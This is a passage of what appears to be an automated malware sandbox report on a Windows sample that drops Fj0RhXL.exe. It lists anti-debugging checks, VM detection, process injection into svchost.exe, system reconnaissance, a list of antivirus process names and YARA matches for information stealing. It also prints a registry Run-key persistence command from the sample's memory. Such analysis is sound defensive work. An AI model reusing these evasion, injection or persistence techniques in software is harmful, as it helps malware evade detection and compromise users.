                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe TID: 7344Thread sleep time: -31220s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeLast function: Thread delayed
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeThread sleep count: Count: 3122 delay: -10Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C37270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C372771h6_2_6C37270F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C37270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C372771h7_2_6C37270F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D895F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_03D895F0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D85BF0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,6_2_03D85BF0
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2991068983.000000000244D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2991068983.0000000002491000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991068983.000000000244D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Fj0RhXL.exe, 00000006.00000002.3621818017.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeAPI call chain: ExitProcess graph end nodegraph_0-19347
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeAPI call chain: ExitProcess graph end nodegraph_0-19203
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeAPI call chain: ExitProcess graph end nodegraph_6-111222
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-18903
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSystem information queried: KernelDebuggerInformationJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_0429A505 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0429A505
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9BC4A VirtualProtect ?,-00000001,00000104,?6_2_03D9BC4A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F0C5FC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_02F0C5FC
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_04290B11 mov eax, dword ptr fs:[00000030h]0_2_04290B11
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02EB05B8 mov eax, dword ptr fs:[00000030h]6_2_02EB05B8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02EB05B0 mov eax, dword ptr fs:[00000030h]6_2_02EB05B0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032B00DB mov eax, dword ptr fs:[00000030h]6_2_032B00DB
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F14407 GetProcessHeap,6_2_02F14407
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_0429A505 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0429A505
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_1000A501 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000A501
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_1000D3E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000D3E6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F08697 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02F08697
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F06925 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_02F06925
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D98AA0 Sleep,CloseHandle,CloseHandle,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,6_2_03D98AA0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DA0B07 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_03DA0B07
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9A49B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_03D9A49B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C3D1F6A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C3D6D68
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C3D1F75
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C3D6D68
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C3D1F75
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C3D1F6A

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F05810 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,6_2_02F05810
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D88CE0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,6_2_03D88CE0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe6_2_03D88CE0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe6_2_03D88CE0
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" Jump to behavior
                      Source: Fj0RhXL.exe, 00000006.00000002.3623114909.0000000003F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                      Source: N6xnw0iEGs.exe, N6xnw0iEGs.exe, 00000000.00000002.2992675426.0000000010017000.00000002.00001000.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: N6xnw0iEGs.exe, N6xnw0iEGs.exe, 00000000.00000002.2992675426.0000000010017000.00000002.00001000.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SHELL_TrayWnd
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2992675426.0000000010017000.00000002.00001000.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Pragma: no-cacheGETlibcef.dllv4.0.30319%s%s\%slib%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClass1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,6_2_03D85BF0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_03DA93C5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoA,6_2_03DAC31C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_03DA9305
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_03DA9134
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_03DA90D9
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_03DA9032
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_03DA8F3D
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_03DABCEC
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_03DA9468
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_03DABC12
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_03DA942C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_6C3EFC04
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C3EFCF0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: EnumSystemLocalesA,6_2_6C3EFCC6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C3EFD57
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6C3EFD93
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoA,6_2_6C3F3FD6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6C3EF83C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_6C3EF931
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6C3EF9D8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6C3EFA33
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6C3EE436
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6C3EE510
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_6C3EFC04
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_6C3EFCF0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: EnumSystemLocalesA,7_2_6C3EFCC6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_6C3EFD57
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_6C3EFD93
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoA,7_2_6C3F3FD6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_6C3EF83C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_6C3EF931
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_6C3EF9D8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_6C3EFA33
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_6C3EE436
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_6C3EE510
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_005344E1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005344E1
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D85BF0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,6_2_03D85BF0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DA498D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_03DA498D
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D87F70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,6_2_03D87F70
                      Source: Fj0RhXL.exeBinary or memory string: acs.exe
                      Source: Fj0RhXL.exeBinary or memory string: kxetray.exe
                      Source: Fj0RhXL.exeBinary or memory string: avcenter.exe
                      Source: Fj0RhXL.exeBinary or memory string: vsserv.exe
                      Source: Fj0RhXL.exeBinary or memory string: KSafeTray.exe
                      Source: Fj0RhXL.exeBinary or memory string: cfp.exe
                      Source: Fj0RhXL.exeBinary or memory string: avp.exe
                      Source: Fj0RhXL.exeBinary or memory string: 360Safe.exe
                      Source: N6xnw0iEGs.exe, Fj0RhXL.exeBinary or memory string: 360tray.exe
                      Source: Fj0RhXL.exeBinary or memory string: rtvscan.exe
                      Source: Fj0RhXL.exeBinary or memory string: TMBMSRV.exe
                      Source: Fj0RhXL.exeBinary or memory string: ashDisp.exe
                      Source: Fj0RhXL.exeBinary or memory string: 360Tray.exe
                      Source: Fj0RhXL.exeBinary or memory string: avgwdsvc.exe
                      Source: Fj0RhXL.exeBinary or memory string: AYAgent.aye
                      Source: Fj0RhXL.exeBinary or memory string: QUHLPSVC.EXE
                      Source: Fj0RhXL.exeBinary or memory string: RavMonD.exe
                      Source: Fj0RhXL.exeBinary or memory string: Mcshield.exe
                      Source: Fj0RhXL.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3d80000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13a300b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3bf05bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3b41004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13e7a73.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3d80000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3bf05bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13e7a73.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.3b41004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.3a81053.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.13a300b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.4fd5a53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.Fj0RhXL.exe.3a81053.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Fj0RhXL.exe PID: 5408, type: MEMORYSTR
